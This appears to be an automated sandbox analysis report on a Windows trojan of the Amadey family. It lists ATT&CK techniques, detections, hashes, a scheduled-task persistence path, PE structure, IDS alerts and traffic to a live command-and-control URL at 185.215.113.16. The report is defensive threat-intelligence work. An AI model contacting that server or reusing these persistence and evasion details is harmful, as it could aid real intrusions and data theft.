                    Source: Yara matchFile source: 00000002.00000003.2145696772.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.2145827348.00000000053B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2186678248.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter
                    1
                    Scheduled Task/Job
                    12
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    1
                    Scheduled Task/Job
                    251
                    Virtualization/Sandbox Evasion
                    LSASS Memory741
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    12
                    Process Injection
                    Security Account Manager2
                    Process Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information
                    NTDS251
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput Capture11
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    Account Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                    System Owner/User Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    File and Directory Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow224
                    System Information Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    9ICG2PuZbG.exe53%VirustotalBrowse
                    9ICG2PuZbG.exe100%AviraTR/Crypt.TPM.Gen
                    9ICG2PuZbG.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe53%VirustotalBrowse
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpi/;100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpcoded100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php)100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php100%Avira URL Cloudmalware
                    http://185.215.113.16/Jo89Ku7d/index.phpd100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpC100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php4%VirustotalBrowse
                    http://185.215.113.16/Jo89Ku7d/index.phpB100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpd6%VirustotalBrowse
                    http://185.215.113.16/Jo89Ku7d/index.phpcoded19%VirustotalBrowse
                    http://185.215.113.16/Jo89Ku7d/index.phpC12%VirustotalBrowse
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedq100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php9100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php3;100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpv100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpB12%VirustotalBrowse
                    http://185.215.113.16/Jo89Ku7d/index.phpu100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpt100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b519%VirustotalBrowse
                    http://185.215.113.16/Jo89Ku7d/index.phpS100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpu15%VirustotalBrowse
                    http://185.215.113.16/Jo89Ku7d/index.phpR100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpv19%VirustotalBrowse
                    http://185.215.113.16/Jo89Ku7d/index.phpt16%VirustotalBrowse
                    http://185.215.113.16/Jo89Ku7d/index.phpncoded100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpS14%VirustotalBrowse
                    http://185.215.113.16/Jo89Ku7d/index.phpncoded9%VirustotalBrowse
                    http://185.215.113.16/Jo89Ku7d/index.phpP10%VirustotalBrowse
                    http://185.215.113.16/Jo89Ku7d/index.php910%VirustotalBrowse
                    http://185.215.113.16/Jo89Ku7d/index.phpR12%VirustotalBrowse
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://185.215.113.16/Jo89Ku7d/index.phptrue
                    • 4%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 19%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpcodedaxplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 19%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.php)axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpi/;axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpdaxplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 6%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpCaxplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 12%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpBaxplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 12%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedqaxplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.php9axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 10%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpvaxplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 19%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.php3;axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpuaxplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 15%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phptaxplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 16%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpSaxplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 14%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpRaxplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 12%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/Jo89Ku7d/index.phpPaxplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedaxplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 9%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    185.215.113.16
                    unknownPortugal
                    206894WHOLESALECONNECTIONSNLtrue
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1483403
                    Start date and time:2024-07-27 09:33:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 30s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:9ICG2PuZbG.exe
                    renamed because original name is a hash value
                    Original Sample Name:c9774cb1f811aa79f9fdc173ee3de6c1.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                    EGA Information:
                    • Successful, ratio: 25%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target 9ICG2PuZbG.exe, PID 4816 because it is empty
                    • Execution Graph export aborted for target axplong.exe, PID 1804 because there are no executed function
                    • Execution Graph export aborted for target axplong.exe, PID 6048 because there are no executed function
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    TimeTypeDescription
                    03:35:01API Interceptor161841x Sleep call for process: axplong.exe modified
                    09:34:01Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.215.113.16file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    8NjcvPNvUr.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    setup.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    setup.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    setup.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    EXyAlLKIck.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/Jo89Ku7d/index.php
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    f3wrBtIYXx.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.19
                    8NjcvPNvUr.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    11NdzR12PS.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.19
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousPython Stealer, Amadey, Monster Stealer, RedLine, Stealc, VidarBrowse
                    • 185.215.113.16
                    setup.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.19
                    setup.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    setup.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.19
                    setup.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exefile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      Process:C:\Users\user\Desktop\9ICG2PuZbG.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):1897984
                      Entropy (8bit):7.950411286019677
                      Encrypted:false
                      SSDEEP:49152:ebHYEgxYn9rPTKy3fen0WJ23JVTHMFimNajMY4Jz:guxmj1Gn01JaimEB4
                      MD5:C9774CB1F811AA79F9FDC173EE3DE6C1
                      SHA1:8E4EEC92572D83710B55750E3DAB9A793E8DC23B
                      SHA-256:1DBBF81D6F4B2222B37594E8FF30672BF85FD360F347CBD20B1A5D7B841DD276
                      SHA-512:A2577A268C38A0835DC3F49CC9FA2D499617A6BF98202AB862F323F222511930825EC1EF320A75EC66CA6C4375331BA088D16F00AA312906EE2A895CB3739803
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: Virustotal, Detection: 53%, Browse
                      Joe Sandbox View:
                      • Filename: file.exe, Detection: malicious, Browse
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................K...........@...........................K...........@.................................W...k............................vK..............................vK..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...pcxsfzhs......1.....................@...plzfkdac......K.....................@....taggant.0....K.."..................@...........................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\9ICG2PuZbG.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:[ZoneTransfer]....ZoneId=0
                      Process:C:\Users\user\Desktop\9ICG2PuZbG.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):304
                      Entropy (8bit):3.4308071740850083
                      Encrypted:false
                      SSDEEP:6:ycXlXUEZ+lX1lOJUPelkDdtE9+AQy0l1Rct0:ym1Q1lOmeeDs9+nV1Rct0
                      MD5:5A929837AFE7F408B520E0123A9B7EFB
                      SHA1:B01EE60EF6C454DE105E345670E3EC8E6DBEF86E
                      SHA-256:9615272B91F3F040200466A06E2D1576EE0917C25E570E8EC414753AF45A9A8D
                      SHA-512:DA694C73BF6FC91C8E06647304B4FE0EC2AFBA70A5C1CEA4AA31E70C8D8EA51999915E05F46BB82E1DFED66D53182252CCB80EE129FA5C0FC938AA461E633F97
                      Malicious:false
                      Reputation:low
                      Preview:........p..O.B...V..F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................#.@3P.........................
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.950411286019677
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:9ICG2PuZbG.exe
                      File size:1'897'984 bytes
                      MD5:c9774cb1f811aa79f9fdc173ee3de6c1
                      SHA1:8e4eec92572d83710b55750e3dab9a793e8dc23b
                      SHA256:1dbbf81d6f4b2222b37594e8ff30672bf85fd360f347cbd20b1a5d7b841dd276
                      SHA512:a2577a268c38a0835dc3f49cc9fa2d499617a6bf98202ab862f323f222511930825ec1ef320a75ec66ca6c4375331ba088d16f00aa312906ee2a895cb3739803
                      SSDEEP:49152:ebHYEgxYn9rPTKy3fen0WJ23JVTHMFimNajMY4Jz:guxmj1Gn01JaimEB4
                      TLSH:B09533031BEAA735EA61C8756AD7B6D768BAC741061026E80C17833DBC43E275392FE5
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                      Icon Hash:00928e8e8686b000
                      Entrypoint:0x8b9000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:6
                      OS Version Minor:0
                      File Version Major:6
                      File Version Minor:0
                      Subsystem Version Major:6
                      Subsystem Version Minor:0
                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                      Instruction
                      jmp 00007F3A9548EDAAh
                      paddq mm3, qword ptr [eax+eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      jmp 00007F3A95490DA5h
                      add byte ptr [esi], al
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], dh
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add al, 00h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [esi], al
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [ebp+00000080h], dh
                      add byte ptr [eax], al
                      add byte ptr [eax], dh
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [edx+00000000h], al
                      add byte ptr [eax], al
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4b76f80x10pcxsfzhs
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x4b76a80x18pcxsfzhs
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      0x10000x680000x2de00ebd0322787ffa82b7681029ad254cc30False0.9967749489100818data7.977259343253602IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x690000x1e00x20080ea1db8ef66d9a702a0049e12af25e5False0.578125data4.515349506855509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      0x6b0000x2af0000x200f70f087bda31f67a29ab52f42f9d3446unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      pcxsfzhs0x31a0000x19e0000x19da000f3f166f9899875b9ea59e5e38221959False0.9944540457842248data7.95412617888117IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      plzfkdac0x4b80000x10000x600048b0968eeca4681e41f030c53def840False0.5677083333333334data4.877952877015968IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant0x4b90000x30000x22009886932fadd4a9a3e6b7d91e31a6a916False0.06387867647058823DOS executable (COM)0.6751943224698626IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_MANIFEST0x4b77080x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                      DLLImport
                      kernel32.dlllstrcpy
                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States
                      TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                      2024-07-27T09:35:15.178285+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34973080192.168.2.6185.215.113.16
                      2024-07-27T09:35:03.733473+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34972080192.168.2.6185.215.113.16
                      2024-07-27T09:35:09.411291+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34972580192.168.2.6185.215.113.16
                      2024-07-27T09:34:19.975301+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971240.127.169.103192.168.2.6
                      2024-07-27T09:34:57.403458+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971913.85.23.86192.168.2.6
                      TimestampSource PortDest PortSource IPDest IP
                      Jul 27, 2024 09:35:02.981617928 CEST4972080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:02.987091064 CEST8049720185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:02.987293959 CEST4972080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:02.987384081 CEST4972080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:02.992677927 CEST8049720185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:03.733216047 CEST8049720185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:03.733473063 CEST4972080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:03.735327005 CEST4972080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:03.740195990 CEST8049720185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:03.981780052 CEST8049720185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:03.981863022 CEST4972080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:04.097553015 CEST4972080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:04.097882986 CEST4972180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:04.103219986 CEST8049720185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:04.103311062 CEST4972080192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:04.103507042 CEST8049721185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:04.103590965 CEST4972180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:04.103796005 CEST4972180192.168.2.6185.215.113.16
                      Jul 27, 2024 09:35:04.108922005 CEST8049721185.215.113.16192.168.2.6
                      Jul 27, 2024 09:35:04.854263067 CEST8049721185.215.113.16192.168.2.6
